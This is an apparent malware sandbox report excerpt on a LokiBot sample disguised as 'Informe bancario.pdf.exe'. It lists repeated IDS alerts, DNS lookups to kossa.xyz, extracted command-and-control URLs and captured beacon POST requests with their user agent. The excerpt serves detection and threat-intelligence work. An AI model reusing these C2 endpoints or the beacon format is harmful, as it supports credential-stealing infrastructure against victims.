Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49774 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49775 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49776 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49778 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49780 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49792 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49803 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49803 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49803 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49803 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49813 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49813 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49813 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49813 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49816 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49816 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49816 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49816 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49831 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49831 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49831 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49831 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49835 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49835 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49835 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49835 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49836 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49836 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49836 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49836 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49837 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49837 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49837 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49837 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49843 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49843 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49843 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49843 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49844 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49844 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49844 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49844 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49845 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49845 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49845 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49845 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49852 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49852 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49852 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49852 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49859 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49865 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49872 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49872 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49872 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49872 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49873 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49873 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49873 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49873 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49875 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49875 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49875 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49875 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49876 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49876 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49876 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49876 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49877 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49877 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49877 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49877 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49881 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49881 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49881 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49881 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49882 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49882 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49882 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49882 -> 172.67.154.72:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49883 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49883 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49883 -> 104.21.40.153:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49883 -> 104.21.40.153:80

Performs DNS queries to domains with low reputation

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	DNS query: kossa.xyz
Source:	DNS query: kossa.xyz

Yara detected Generic Downloader

Source: Yara match

File source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://kossa.xyz/esi/pp/play.php

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
